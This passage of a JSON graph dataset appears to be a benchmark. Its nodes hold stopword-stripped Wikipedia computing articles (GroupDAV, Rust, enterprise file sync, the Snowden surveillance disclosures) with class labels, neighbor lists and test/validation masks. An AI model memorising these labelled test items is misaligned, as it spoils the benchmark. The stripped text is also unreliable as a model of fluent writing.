      7369,
      8904,
      10442,
      4303,
      208,
      6352,
      10451,
      3796,
      7893,
      2263,
      7899,
      6368,
      3298,
      1251,
      2275,
      3299,
      1254,
      1768,
      3305,
      5865,
      2798,
      7411,
      5877,
      3323,
      766,
      3843,
      2825,
      266,
      4875,
      268,
      8462,
      6928,
      1814,
      10232,
      793,
      6425,
      11544,
      7965,
      8478,
      289,
      3361,
      1315,
      4898,
      10529,
      297,
      11561,
      7979,
      3372,
      9517,
      1838,
      10545,
      3890,
      310,
      311,
      316,
      10557,
      8512,
      4930,
      1350,
      327,
      5959,
      4937,
      6985,
      8519,
      10574,
      11086,
      2384,
      2897,
      11089,
      4435,
      3924,
      4948,
      7510,
      8023,
      9048,
      2906,
      7515,
      4956,
      6494,
      1888,
      10082,
      10594,
      2917,
      1381,
      7527,
      7528,
      11109,
      9068,
      365,
      4463,
      2419,
      8564,
      6005,
      8567,
      10110,
      9088,
      6017,
      7556,
      1930,
      2957,
      2958,
      7056,
      10128,
      3476,
      1941,
      10132,
      5527,
      2973,
      1440,
      2464,
      4001,
      7073,
      3495,
      4007,
      8104,
      10154,
      6572,
      1453,
      11695,
      1970,
      6578,
      8632,
      1466,
      10683,
      1986,
      4036,
      7620,
      5574,
      6599,
      1480,
      5577,
      10697,
      4555,
      7119,
      4049,
      2005,
      4566,
      8661,
      3544,
      8664,
      9688,
      8156,
      991,
      7137,
      8674,
      4067,
      3559,
      488,
      7145,
      8170,
      1515,
      2027,
      9196,
      4595,
      1528,
      1532,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 7888,
    "label": 5,
    "text": "GroupDAV:groupdav groupdav computer protocol used connect open source groupware clients open source groupware servers primary design goal simple possible implement focusing end-user issues open source applications extremely extensive command set based subset webdav client side groupdav implementations exist kde kontact evolution thunderbird outlook work mozilla calendar project progress servers include opengroupware.org sogo citadel system egroupware addition webdav caldav carddav server implicitly groupdav v2 server groupdav relationship caldav viewed differently different developers earliest implementors intended protocol complementary caldav effort caldav provides extensive operations calendar folders others positioned groupdav leading protocol citing caldav excessive complexity source interoperability bugs dichotomy likely become irrelevant future however straightforward server simultaneously support variants groupdav considered subset caldav rfc 4791 carddav rfc 6352 intended less complex applications",
    "neighbors": [
      11418,
      2695
    ],
    "mask": "Test"
  },
  {
    "node_id": 7889,
    "label": 9,
    "text": "Rust_(programming_language):rust programming language rust multi-paradigm system programming language focused safety especially safe concurrency rust syntactically similar c++ designed provide better memory safety maintaining high performance rust originally designed graydon hoare mozilla research contributions dave herman brendan eich others designers refined language writing servo layout browser engine rust compiler compiler free open-source software dual-licensed mit license apache license 2.0 rust loved programming language stack overflow developer survey 2016 2017 2018 2019 rust intended language highly concurrent highly safe systems programming large creating maintaining boundaries preserve large-system integrity led feature set emphasis safety control memory layout concurrency performance idiomatic rust comparable performance idiomatic c++ concrete syntax rust similar c c++ blocks code delimited curly brackets control flow keywords codice_1 codice_2 codice_3 codice_4 c c++ keywords implemented however rust functions use keyword codice_5 pattern matching less familiar versed languages despite superficial resemblance c c++ syntax rust deeper sense closer ml family languages haskell language nearly every part function body expression even control flow operators example ordinary codice_1 expression also takes place function need end codice_7 expression case last expression function creates return value system designed memory safe permit null pointers dangling pointers data races safe code data values initialized fixed set forms require inputs already initialized replicate function languages pointers either valid codice_8 linked list binary tree data structures rust core library provides option type used test pointer codice_9 value codice_10 rust also introduces added syntax manage lifetimes compiler reasons borrow checker rust use automated garbage collection system like used go java .net framework instead memory resources managed resource acquisition initialization raii convention optional reference counting rust provides deterministic management resources low overhead rust also favors stack allocation values perform implicit boxing also concept references using codice_11 symbol involve run-time reference counting safety using pointers verified compile time borrow checker preventing dangling pointers forms undefined behavior rust ownership system values unique owner scope value scope owner values passed immutable reference using codice_12 mutable reference using codice_13 value using codice_14 times either multiple immutable references one mutable reference rust compiler enforces rules compile time also checks references valid type system supports mechanism similar type classes called traits inspired directly haskell language facility ad hoc polymorphism achieved adding constraints type variable declarations features haskell higher-kinded polymorphism yet supported rust features type inference variables declared keyword codice_15 variables require value initially assigned determine type compile-time error results branch code fails assign value variable variables assigned multiple times must marked keyword codice_16 functions given generic parameters usually require generic type implement certain trait traits within function generic value used traits means generic function type-checked soon defined contrast c++ templates fundamentally duck typed checked instantiated concrete types c++ concepts address issue expected part c++20 2020 however implementation rust generics similar typical implementation c++ templates separate copy code generated instantiation called monomorphization contrasts type erasure scheme typically used java haskell benefit monomorphization optimized code specific use case drawback increased compile time size resulting binaries object system within rust based around implementations traits structured types implementations fulfill role similar classes within languages defined keyword codice_17 inheritance polymorphism provided traits allow methods defined mixed implementations structured types used define fields implementations traits define fields traits provide inheritance among benefits prevents diamond problem multiple inheritance c++ words rust supports interface inheritance replaces implementation inheritance composition see composition inheritance language grew personal project begun 2006 mozilla employee graydon hoare stated project possibly named rust family fungi mozilla began sponsoring project 2009 announced 2010 year work shifted initial compiler written ocaml self-hosting compiler written rust named successfully compiled 2011. uses llvm back end first numbered pre-alpha release rust compiler occurred january 2012 rust 1.0 first stable release released may 15 2015 following 1.0 stable point releases delivered every six weeks features developed nightly rust tested alpha beta releases last six weeks along conventional static typing version 0.4 rust also supported typestates typestate system modeled assertions program statements use special codice_18 statement discrepancies could discovered compile time rather program running might case assertions c c++ code typestate concept unique rust first introduced language nil typestates removed practice little used though function still achieved branding pattern style object system changed considerably within versions 0.2 0.3 0.4 rust version 0.2 introduced classes first time version 0.3 adding several features including destructors polymorphism use interfaces rust 0.4 traits added means provide inheritance interfaces unified traits removed separate feature classes also removed replaced combination implementations structured types starting rust 0.9 ending rust 0.11 rust two built-in pointer types codice_19 codice_20 simplifying core memory model reimplemented pointer types standard library codice_21 removed codice_22 january 2014 editor-in-chief dr dobb andrew binstock commented rust chances become competitor c++ upcoming languages go nim nimrod according binstock rust widely viewed remarkably elegant language adoption slowed changed repeatedly versions rust third-most-loved programming language 2015 stack overflow annual survey took first place 2016 2017 2018 2019 language referenced oxidised metal simple hello world program written rust codice_23 macro prints message standard output fn main fn factorial u64 u64 fn factorial u64 u64 fn factorial u64 u64 web browser several related components written rust including many operating systems os related components written rust january 2019 oses included blogos intermezzos quiltos redox rustos rux tefflin tock wikipedia articles exist",
    "neighbors": [
      9224,
      9736,
      4623,
      7187,
      1556,
      3613,
      9245,
      9757,
      9762,
      5165,
      5677,
      5684,
      574,
      6718,
      2557,
      7234,
      9281,
      10819,
      8773,
      8262,
      6228,
      6231,
      10333,
      9828,
      10340,
      1130,
      2666,
      10860,
      4728,
      3705,
      7292,
      637,
      1664,
      9345,
      7813,
      5255,
      6791,
      1673,
      2186,
      6797,
      9871,
      10387,
      3734,
      5783,
      11418,
      7326,
      4777,
      9385,
      4268,
      2224,
      1713,
      1203,
      692,
      7347,
      7861,
      11449,
      1724,
      7361,
      8385,
      5833,
      6345,
      9931,
      7885,
      7386,
      228,
      10470,
      5356,
      9964,
      10991,
      10480,
      5879,
      8443,
      8700,
      2304,
      5380,
      11017,
      8973,
      1295,
      7951,
      9490,
      2836,
      1813,
      10006,
      5917,
      8990,
      10013,
      3876,
      6438,
      7983,
      11574,
      823,
      10043,
      10555,
      10057,
      8524,
      2893,
      847,
      10581,
      2903,
      10584,
      10586,
      8539,
      10078,
      10083,
      8549,
      6502,
      8554,
      7537,
      3446,
      1399,
      3960,
      7543,
      6016,
      3462,
      4998,
      8582,
      1931,
      1935,
      8082,
      10649,
      11161,
      1435,
      6555,
      7071,
      1952,
      1954,
      7076,
      5546,
      428,
      5040,
      6074,
      5054,
      9152,
      1474,
      963,
      8644,
      6086,
      11219,
      5588,
      11221,
      5078,
      2519,
      6102,
      4057,
      477,
      482,
      10722,
      4069,
      9701,
      7143,
      8169,
      10729,
      7147,
      10739,
      3573,
      6133,
      7671,
      1016,
      5114,
      2556,
      2045,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7890,
    "label": 2,
    "text": "Chunking_(computing):chunking computing computer programming chunking multiple meanings typical modern software systems allocate memory dynamically structures known heaps calls made heap-management routines allocate free memory heap management involves computation time performance issue chunking refers strategies improving performance using special knowledge situation aggregate related memory-allocation requests example known certain kind object typically required groups eight instead allocating freeing object individually making sixteen calls heap manager one could allocate free array eight objects reducing number calls two chunking specific feature http 1.1 protocol meaning opposite used memory management refers facility allows inconveniently large messages broken conveniently-sized smaller chunks",
    "neighbors": [
      178
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7891,
    "label": 7,
    "text": "Enterprise_file_synchronization_and_sharing:enterprise file synchronization sharing enterprise file synchronization sharing also known efss enterprise file sync share refers software services enable organizations securely synchronize share documents photos videos files multiple devices employees external customers partners organizations often adopt technologies prevent employees using consumer-based file sharing apps store access manage corporate data outside department ’ control visibility efss applications often characterized following features capabilities depending efss provider offers services deployed using cloud computing on-premises hybrid according forrester research efss providers provide ability lockdown data certain geographies companies requirements store content/metadata specific jurisdictions box one first efss products originally developed college project aaron levie student university southern california 2004 levie left school run company full-time 2005 2007 dropbox founded officially launched 2008 techcrunch disrupt conference year microsoft began beta testing windows live folders predecessor onedrive around 2010 efss market emerged 100 vendors variety technology backgrounds including backup cloud storage citrix sharefile syncplicity managed file transfer accellion biscom box hightail thru enterprise content management many developed alternatives consumer file sync sharing services security features place protect company information flexibility integrate existing content repositories business applications october 2011 software company citrix systems announced acquired private enterprise file sync share service sharefile add citrix product line sharefile competitor box dropbox focused selling product departments large organizations 2012 ctera networks entered efss market july 2013 forrester research released first “ forrester wave ” report efss market identified scored products significant providers june 25 2014 google announced i/o conference entering enterprise file sharing market release “ google drive work. ” july 2014 gartner research released first “ magic quadrant ” report efss market study evaluates strengths cautions notable vendors industry october 2014 encrypted vendor tresorit entered efss market tresorit business tresorit competitor dropbox box promising businesses security privacy compliance end-to-end encryption april 2015 blackberry limited paid 100 million 150 million buy watchdox ltd. enterprise file sync sharing capabilities july 2015 one efss vendor syncplicity sold private equity firm skyview capital previous owner emc corporation",
    "neighbors": [
      929,
      4194,
      2213,
      4869,
      10245,
      3629,
      1935,
      4623,
      6897,
      10161,
      1239,
      10265,
      5371
    ],
    "mask": "None"
  },
  {
    "node_id": 7892,
    "label": 1,
    "text": "CJK_Dictionary_Institute:cjk dictionary institute cjk dictionary institute inc. cjki japan-based dictionary compilation company headed jack halpern specializes chinese japanese korean arabic lexicography well compilation maintenance large-scale lexical databases notable works include forthcoming cjki arabic learner dictionary kodansha kanji learner dictionary known introducing skip system kanji indexing patterns popular method kanji indexing addition printed works cjki produces language-oriented mobile applications ios android various electronic dictionaries include large number technical dictionaries covering subjects mechanical engineering economics medicine cjki maintains licenses large-scale lexical databases covering total approximately 24 million entries japanese chinese korean arabic notably database arabic names dan contains 6.5 million entries designed security applications e.g terrorist watchlists anti-money laundering systems customer identity management systems general natural language processing cjki ’ databases currently licensed number software development companies including fujitsu sony ibm google microsoft yahoo amazon cjki also responsible producing academic papers regarding technological linguistic issues pertaining chinese japanese korean arabic include papers discussing natural language processing use dictionaries language education 2009 paper introduces cjki arabic romanization system cars new arabic romanization including indications word stress vowel neutralization jack halpern founder ceo cjk dictionary institute linguist entrepreneur halpern speaker 10 languages editor chief kodansha kanji learner ’ dictionary addition work cjki halpern avid unicyclist founding serving executive director international development international unicycling federation lived japan 30 years",
    "neighbors": [
      7780,
      2414
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7893,
    "label": 4,
    "text": "Global_surveillance_disclosures_(2013–present):global surveillance disclosures 2013–present ongoing news reports international media revealed operational details united states national security agency nsa international partners global surveillance foreign nationals u.s. citizens reports mostly emanate cache top secret documents leaked ex-nsa contractor edward snowden obtained whilst working booz allen hamilton one largest contractors defense intelligence united states addition trove u.s. federal documents snowden cache reportedly contains thousands australian british canadian intelligence files accessed via exclusive five eyes network june 2013 first snowden documents published simultaneously washington post guardian attracting considerable public attention disclosure continued throughout 2013 small portion estimated full cache documents later published media outlets worldwide notably new york times united states canadian broadcasting corporation australian broadcasting corporation der spiegel germany globo brazil le monde france l'espresso italy nrc handelsblad netherlands dagbladet norway el país spain sveriges television sweden media reports shed light implications several secret treaties signed members ukusa community efforts implement global surveillance example der spiegel revealed german foreign intelligence service bnd transfers massive amounts intercepted data nsa swedish television revealed national defence radio establishment fra provided nsa data cable collection secret treaty signed 1954 bilateral cooperation surveillance security intelligence agencies involved practice global surveillance include australia asd britain gchq canada csec denmark pet france dgse germany bnd italy aise netherlands aivd norway nis spain cni switzerland ndb singapore sid well israel isnu receives raw unfiltered data u.s. citizens shared nsa june 14 2013 united states prosecutors charged edward snowden espionage theft government property late july 2013 granted one-year temporary asylum russian government contributing deterioration russia–united states relations august 6 2013 u.s. president barack obama made public appearance national television told americans n't domestic spying program spying americans towards end october 2013 british prime minister david cameron warned guardian publish leaks receive da-notice november 2013 criminal investigation disclosure undertaken britain metropolitan police service december 2013 guardian editor alan rusbridger said published think 26 documents far 58,000 've seen extent media reports responsibly informed public disputed january 2014 obama said sensational way disclosures come often shed heat light critics sean wilentz noted many snowden documents released concern domestic surveillance us uk defense establishment weigh strategic harm period following disclosures heavily civic public benefit first assessment disclosures pentagon concluded snowden committed biggest theft u.s. secrets history united states sir david omand former director gchq described snowden disclosure catastrophic loss british intelligence ever barton gellman pulitzer prize–winning journalist led washington post coverage snowden disclosures summarized leaks follows disclosure revealed specific details nsa close cooperation u.s. federal agencies federal bureau investigation fbi central intelligence agency cia addition agency previously undisclosed financial payments numerous commercial partners telecommunications companies well previously undisclosed relationships international partners britain france germany secret treaties foreign governments recently established sharing intercepted data citizens disclosures made public course several months since june 2013 press several nations trove leaked former nsa contractor edward j. snowden obtained trove working booz allen hamilton george brandis attorney-general australia asserted snowden disclosure serious setback western intelligence since second world war global surveillance programs include nsa also getting data directly telecommunications companies codenamed artifice lithium serenade steelknight x real identities companies behind codenames included snowden document dump protected exceptionally controlled information prevents wide circulation even like snowden otherwise necessary security clearance although exact size snowden disclosure remains unknown following estimates put various government officials contractor nsa snowden granted access u.s. government documents along top secret documents several allied governments via exclusive five eyes network snowden claims currently physical possession documents surrendered copies journalists met hong kong according lawyer snowden pledged release documents russia leaving responsibility disclosures solely journalists 2014 following news outlets accessed documents provided snowden australian broadcasting corporation canadian broadcasting corporation channel 4 der spiegel el pais el mundo l'espresso le monde nbc nrc handelsblad dagbladet globo south china morning post süddeutsche zeitung sveriges television guardian new york times washington post 1970s nsa analyst perry fellwock pseudonym winslow peck revealed existence ukusa agreement forms basis echelon network whose existence revealed 1988 lockheed employee margaret newsham months september 11 attacks aftermath details global surveillance apparatus provided various individuals former mi5 official david shayler journalist james bamford followed aftermath snowden revelations pentagon concluded snowden committed biggest theft u.s. secrets history united states australia coalition government described leaks damaging blow dealt australian intelligence history sir david omand former director gchq described snowden disclosure catastrophic loss british intelligence ever april 2012 nsa contractor edward snowden began downloading documents year snowden made first contact journalist glenn greenwald employed guardian contacted documentary filmmaker laura poitras january 2013 may 2013 snowden went temporary leave position nsa citing pretext receiving treatment epilepsy towards end may traveled hong kong greenwald poitras guardian defence intelligence correspondent ewen macaskill flew hong kong meet snowden u.s.-based editor guardian janine gibson held several meetings new york city decided greenwald poitras guardian defence intelligence correspondent ewen macaskill would fly hong kong meet snowden june 5 first media report based leaked material guardian exposed top secret court order showing nsa collected phone records 120 million verizon subscribers order numbers parties call well location data unique identifiers time call duration call handed fbi turned records nsa according wall street journal verizon order part controversial data program seeks stockpile records calls made u.s. collect information directly t-mobile us verizon wireless part foreign ownership ties june 6 2013 second media disclosure revelation prism surveillance program collects e-mail voice text video chats foreigners unknown number americans microsoft google facebook yahoo apple tech giants published simultaneously guardian washington post der spiegel revealed nsa spying multiple diplomatic missions european union eu united nations headquarters new york specific episodes within four-year period nsa hacked several chinese mobile-phone companies chinese university hong kong tsinghua university beijing asian fiber-optic network operator pacnet australia canada new zealand uk explicitly exempted nsa attacks whose main target eu germany method bugging encrypted fax machines used eu embassy codenamed dropmire 2009 g-20 london summit british intelligence agency government communications headquarters gchq intercepted communications foreign diplomats addition gchq intercepting storing mass quantities fiber-optic traffic via tempora two principal components tempora called mastering internet mti global telecoms exploitation data preserved three days metadata kept thirty days data collected gchq tempora shared national security agency nsa united states 2001 2011 nsa collected vast amounts metadata records detailing email internet usage americans via stellar wind later terminated due operational resource constraints subsequently replaced newer surveillance programs shelltrumpet processed one trillionth metadata record end december 2012 nsa follows specific procedures target non-u.s. persons minimize data collection u.s. persons court-approved policies allow nsa according boundless informant 97 billion pieces intelligence collected 30-day period ending march 2013 97 billion sets information 3 billion data sets originated u.s. computer networks around 500 million metadata records collected german networks august 2013 revealed bundesnachrichtendienst bnd germany transfers massive amounts metadata records nsa der spiegel disclosed germany targeted country 27 members european union due nsa systematic monitoring storage germany telephone internet connection data according magazine nsa stores data around half billion communications connections germany month data includes telephone calls emails mobile-phone text messages chat transcripts nsa gained massive amounts information captured monitored data traffic europe example december 2013 nsa gathered average day metadata 15 million telephone connections 10 million internet datasets nsa also monitored european commission brussels monitored eu diplomatic facilities washington united nations placing bugs offices well infiltrating computer networks u.s. government made part upstream data collection program deals companies ensure access hence capability surveil undersea fiber-optic cables deliver e-mails web pages electronic communications phone calls one continent another speed light according brazilian newspaper globo nsa spied millions emails calls brazilian citizens australia new zealand involved joint operation nsa global analytical system xkeyscore among numerous allied facilities contributing xkeyscore four installations australia one new zealand globo released nsa document titled revealed specific locations codenames fornsat intercept stations 2002 according edward snowden nsa established secret intelligence partnerships many western governments foreign affairs directorate fad nsa responsible partnerships according snowden organized foreign governments insulate political leaders public outrage event global surveillance partnerships leaked interview published der spiegel snowden accused nsa bed together germans nsa granted german intelligence agencies bnd foreign intelligence bfv domestic intelligence access controversial xkeyscore system return bnd turned copies two systems named mira4 veras reported exceed nsa sigint capabilities certain areas every day massive amounts metadata records collected bnd transferred nsa via bad aibling station near munich germany december 2012 alone bnd handed 500 million metadata records nsa document dated january 2013 nsa acknowledged efforts bnd undermine privacy laws according nsa document dated april 2013 germany become nsa prolific partner section separate document leaked snowden titled success stories nsa acknowledged efforts german government expand bnd international data sharing partners addition german government well aware prism surveillance program long edward snowden made details public according angela merkel spokesman steffen seibert two separate prism programs – one used nsa used nato forces afghanistan two programs identical guardian revealed details nsa xkeyscore tool allows government analysts search vast databases containing emails online chats browsing histories millions individuals without prior authorization microsoft developed surveillance capability deal interception encrypted chats outlook.com within five months service went testing nsa access outlook.com emails prism collects data prior encryption addition microsoft worked fbi enable nsa gain access cloud storage service skydrive internal nsa document dating august 3 2012 described prism surveillance program team sport even reason suspect u.s. citizens wrongdoing cia national counterterrorism center allowed examine federal government files possible criminal behavior previously ntc barred unless person terror suspect related investigation snowden also confirmed stuxnet cooperatively developed united states israel report unrelated edward snowden french newspaper le monde revealed france dgse also undertaking mass surveillance described illegal outside serious control documents leaked edward snowden seen süddeutsche zeitung sz norddeutscher rundfunk revealed several telecom operators played key role helping british intelligence agency government communications headquarters gchq tap worldwide fiber-optic communications telecom operators assigned particular area international fiber-optic network individually responsible following networks infiltrated gchq tat-14 europe-usa atlantic crossing 1 europe-usa circe south france-uk circe north netherlands-uk flag atlantic-1 flag europa-asia sea-me-we 3 southeast asia-middle east-western europe sea-me-we 4 southeast asia-middle east-western europe solas ireland-uk uk-france 3 uk-netherlands 14 ulysses europe-uk yellow uk-usa pan european crossing telecommunication companies participated forced choice matter companies subsequently paid gchq participation infiltration cables according sz gchq access majority internet telephone communications flowing throughout europe listen phone calls read emails text messages see websites internet users around world visiting also retain analyse nearly entire european internet traffic gchq collecting data transmitted united kingdom northern europe via undersea fibre optic telecommunications cable sea-me-we 3 security intelligence division sid singapore co-operates australia accessing sharing communications carried sea-me-we-3 cable australian signals directorate asd also partnership british american singaporean intelligence agencies tap undersea fibre optic telecommunications cables link asia middle east europe carry much australia international phone internet traffic u.s. runs top-secret surveillance program known special collection service scs based 80 u.s. consulates embassies worldwide nsa hacked united nations video conferencing system summer 2012 violation un agreement nsa intercepting communications americans direct contact foreigners targeted overseas also searching contents vast amounts e-mail text communications country americans mention information foreigners surveillance also spied al jazeera gained access internal communications systems nsa built surveillance network capacity reach roughly 75 u.s. internet traffic u.s. law-enforcement agencies use tools used computer hackers gather information suspects internal nsa audit may 2012 identified 2776 incidents i.e violations rules court orders surveillance americans foreign targets u.s. period april 2011 march 2012 u.s. officials stressed mistakes intentional fisa court supposed provide critical oversight u.s. government vast spying programs limited ability must trust government report improperly spies americans legal opinion declassified august 21 2013 revealed nsa intercepted three years many 56,000 electronic communications year americans suspected links terrorism fisa court oversees surveillance found operation unconstitutional 2011 corporate partner access project major u.s. telecommunications providers receive hundreds millions dollars year nsa voluntary cooperation nsa providers global communications took 1970s cover name blarney letter drafted obama administration specifically inform congress government mass collection americans telephone communications data withheld lawmakers leaders house intelligence committee months key vote affecting future program nsa paid gchq £100 million 2009 2012 exchange funds gchq must pull weight seen pull weight documents referenced article explain weaker british laws regarding spying selling point nsa gchq also developing technology exploit mobile phone time nsa legal authority secret backdoor databases gathered large internet companies enabling search u.s. citizens email phone calls without warrant privacy civil liberties oversight board urged u.s. intelligence chiefs draft stronger us surveillance guidelines domestic spying finding several guidelines updated 30 years u.s. intelligence analysts deliberately broken rules designed prevent spying americans choosing ignore so-called minimisation procedures aimed protecting privacy used nsa agency enormous eavesdropping power spy love interests u.s. foreign secret intelligence court ruled october 2011 nsa activities unconstitutional agency paid millions dollars major internet companies cover extra costs incurred involvement prism surveillance program mastering internet mti part interception modernisation programme imp british government involves insertion thousands dpi deep packet inspection black boxes various internet service providers revealed british media 2009 2013 revealed nsa made £17.2 million financial contribution project capable vacuuming signals 200 fibre-optic cables physical points entry great britain guardian new york times reported secret documents leaked snowden showing nsa collaboration technology companies part aggressive multipronged effort weaken encryption used commercial software gchq team dedicated cracking hotmail google yahoo facebook traffic germany domestic security agency bundesverfassungsschutz bfv systematically transfers personal data german residents nsa cia seven members united states intelligence community exchange information espionage software israel sweden italy also cooperating american british intelligence agencies secret treaty codenamed lustre french intelligence agencies transferred millions metadata records nsa obama administration secretly permission foreign intelligence surveillance court 2011 reverse restrictions national security agency use intercepted phone calls e-mails permitting agency search deliberately americans communications massive databases searches take place surveillance program congress authorized 2008 section 702 foreign intelligence surveillance act law target must foreigner reasonably believed outside united states court must approve targeting procedures order good one year warrant target would thus longer required means communications americans could picked without court first determining probable cause people talking terrorists spies foreign powers fisc extended length time nsa allowed retain intercepted u.s. communications five years six years extension possible foreign intelligence counterintelligence purposes measures done without public debate specific authority congress special branch nsa called follow money ftm monitors international payments banking credit card transactions later stores collected data nsa financial databank tracfin nsa monitored communications brazil president dilma rousseff top aides agency also spied brazil oil firm petrobras well french diplomats gained access private network ministry foreign affairs france swift network united states nsa uses analysis phone call e-mail logs american citizens create sophisticated graphs social connections identify associates locations certain times traveling companions personal information nsa routinely shares raw intelligence data israel without first sifting remove information u.s. citizens effort codenamed genie computer specialists control foreign computer networks using covert implants form remotely transmitted malware tens thousands devices annually worldwide sales smartphones began exceeding feature phones nsa decided take advantage smartphone boom particularly advantageous smartphone combines myriad data would interest intelligence agency social contacts user behavior interests location photos credit card numbers passwords internal nsa report 2010 stated spread smartphone occurring extremely rapidly —developments certainly complicate traditional target analysis according document nsa set task forces assigned several smartphone manufacturers operating systems including apple inc. iphone ios operating system well google android mobile operating system similarly britain gchq assigned team study crack blackberry heading iphone capability document notes smaller nsa programs known scripts perform surveillance 38 different features ios 3 ios 4 operating systems include mapping feature voicemail photos well google earth facebook yahoo messenger september 9 2013 internal nsa presentation iphone location services published der spiegel one slide shows scenes apple 1984 -themed television commercial alongside words knew 1984 ... another shows steve jobs holding iphone text ... would big brother ... third shows happy consumers iphones completing question ... zombies would paying customers october 4 2013 washington post guardian jointly reported nsa gchq made repeated attempts spy anonymous internet users communicating secret via anonymity network tor several surveillance operations involved implantation malicious code computers tor users visit particular websites nsa gchq partly succeeded blocking access anonymous network diverting tor users insecure channels government agencies also able uncover identity anonymous internet users communications security establishment cse using program called olympia map communications brazil mines energy ministry targeting metadata phone calls emails ministry australian federal government knew prism surveillance program months edward snowden made details public nsa gathered hundreds millions contact lists personal e-mail instant messaging accounts around world agency target individuals instead collected contact lists large numbers amount sizable fraction world e-mail instant messaging accounts analysis data enables agency search hidden connections map relationships within much smaller universe foreign intelligence targets nsa monitored public email account former mexican president felipe calderón thus gaining access communications high-ranking cabinet members emails several high-ranking members mexico security forces text mobile phone communication current mexican president enrique peña nieto nsa tries gather cellular landline phone numbers—often obtained american diplomats—for many foreign officials possible contents phone calls stored computer databases regularly searched using keywords nsa monitoring telephone conversations 35 world leaders u.s. government first public acknowledgment tapped phones world leaders reported october 28 2013 wall street journal internal u.s. government review turned nsa monitoring 35 world leaders gchq tried keep mass surveillance program secret feared damaging public debate scale activities could lead legal challenges guardian revealed nsa monitoring telephone conversations 35 world leaders given numbers official another u.s. government department confidential memo revealed nsa encouraged senior officials departments white house state pentagon share rolodexes agency could add telephone numbers leading foreign politicians surveillance systems reacting news german leader angela merkel arriving brussels eu summit accused u.s. breach trust saying need trust allies partners must established repeat spying among friends acceptable anyone goes every citizen germany nsa collected 2010 data ordinary americans cellphone locations later discontinued operational value britain muscular programme nsa gchq secretly broken main communications links connect yahoo google data centers around world thereby gained ability collect metadata content hundreds millions user accounts mobile phone german chancellor angela merkel might tapped u.s. intelligence according spiegel monitoring goes back 2002 ended summer 2013 new york times reported germany evidence nsa surveillance merkel began george w. bush tenure learning der spiegel magazine nsa listening personal mobile phone merkel compared snooping practices nsa stasi reported march 2014 der spiegel merkel also placed nsa surveillance list alongside 122 world leaders october 31 2013 hans-christian ströbele member german bundestag met snowden moscow revealed former intelligence contractor readiness brief german government nsa spying highly sensitive signals intelligence collection program known stateroom involves interception radio telecommunications internet traffic operated diplomatic missions five eyes australia britain canada new zealand united states numerous locations around world program conducted u.s. diplomatic missions run concert u.s. intelligence agencies nsa cia joint venture group called special collection service scs whose members work undercover shielded areas american embassies consulates officially accredited diplomats enjoy special privileges diplomatic protection able look listen unhindered scs example used american embassy near brandenburg gate berlin monitor communications germany government district parliament seat government stateroom surveillance programme australia operates clandestine surveillance facilities intercept phone calls data across much asia france nsa targeted people belonging worlds business politics french state administration nsa monitored recorded content telephone communications history connections target i.e metadata actual surveillance operation performed french intelligence agencies behalf nsa cooperation france nsa confirmed director nsa keith b. alexander asserted foreign intelligence services collected phone records war zones areas outside borders provided nsa french newspaper le monde also disclosed new prism upstream slides see page 4 7 8 coming prism/us-984xn overview presentation spain nsa intercepted telephone conversations text messages emails millions spaniards spied members spanish government december 10 2012 january 8 2013 nsa collected metadata 60 million telephone calls spain according documents leaked snowden surveillance spanish citizens jointly conducted nsa intelligence agencies spain new york times reported nsa carries eavesdropping effort dubbed operation dreadnought iranian leader ayatollah ali khamenei 2009 visit iranian kurdistan agency collaborated gchq u.s. national geospatial-intelligence agency collecting radio transmissions aircraft airports examining khamenei convoy satellite imagery enumerating military radar stations according story objective operation communications fingerprinting ability distinguish khamenei communications people iran story revealed operation code-named ironavenger nsa intercepted e-mails sent country allied united states government adversary ally conducting spear-phishing attack e-mails contained malware nsa gathered documents login credentials belonging enemy country along knowledge ally capabilities attacking computers according british newspaper independent british intelligence agency gchq maintains listening post roof british embassy berlin capable intercepting mobile phone calls wi-fi data long-distance communications german capital including adjacent government buildings reichstag seat german parliament chancellery seat germany head government clustered around brandenburg gate operating code-name quantum insert gchq set fake website masquerading linkedin social website used professional networking part efforts install surveillance software computers telecommunications operator belgacom addition headquarters oil cartel opec infiltrated gchq well nsa bugged computers nine opec employees monitored general secretary opec three years gchq using automated monitoring system code-named royal concierge infiltrate reservation systems least 350 prestigious hotels many different parts world order target search analyze reservations detect diplomats government officials first tested 2010 aim royal concierge track travel plans diplomats often supplemented surveillance methods related human intelligence humint covert operations include wiretapping room telephones fax machines used targeted hotels well monitoring computers hooked hotel network november 2013 australian broadcasting corporation guardian revealed australian signals directorate dsd attempted listen private phone calls president indonesia wife indonesian foreign minister marty natalegawa confirmed president contacted ambassador canberra natalegawa said tapping indonesian politicians personal phones violates every single decent legal instrument think of—national indonesia national australia international well high-ranking indonesian politicians targeted dsd include carrying title 3g impact update classified presentation leaked snowden revealed attempts asd/dsd keep pace rollout 3g technology indonesia across southeast asia asd/dsd motto placed bottom page reads reveal secrets—protect secret deal approved british intelligence officials nsa storing analyzing internet email records uk citizens since 2007 nsa also proposed 2005 procedure spying citizens uk five-eyes nations alliance even partner government explicitly denied u.s. permission proposal partner countries must neither informed particular type surveillance procedure towards end november new york times released internal nsa report outlining agency efforts expand surveillance abilities five-page document asserts law united states kept needs nsa conduct mass surveillance golden age signals intelligence grounds optimism nsa words report titled sigint strategy 2012–2016 also said u.s. try influence global commercial encryption market commercial relationships emphasized need revolutionize analysis vast data collection radically increase operational impact november 23 2013 dutch newspaper nrc handelsblad reported netherlands targeted u.s. intelligence agencies immediate aftermath world war ii period surveillance lasted 1946 1968 also included interception communications european countries including belgium france west germany norway dutch newspaper also reported nsa infected 50,000 computer networks worldwide often covertly malicious spy software sometimes cooperation local authorities designed steal sensitive information according classified documents leaked snowden australian signals directorate asd formerly known defence signals directorate offered share intelligence information collected intelligence agencies ukusa agreement data shared foreign countries include bulk unselected unminimised metadata collected asd provided information condition australian citizens targeted time asd assessed unintentional collection metadata australian nationals viewed significant issue target later identified australian national asd required contacted ensure warrant could sought consideration given whether medical legal religious information would automatically treated differently types data however decision made agency would make determinations case-by-case basis leaked material specify asd collected intelligence information however section 7 intelligence services act 2001 commonwealth states asd role ... obtain intelligence capabilities intentions activities people organisations outside australia ... possible asd metadata intelligence holdings focused foreign intelligence collection within bounds australian law washington post revealed nsa tracking locations mobile phones world tapping cables connect mobile networks globally serve u.s. cellphones well foreign ones process nsa collects five billion records phone locations daily basis enables nsa analysts map cellphone owners relationships 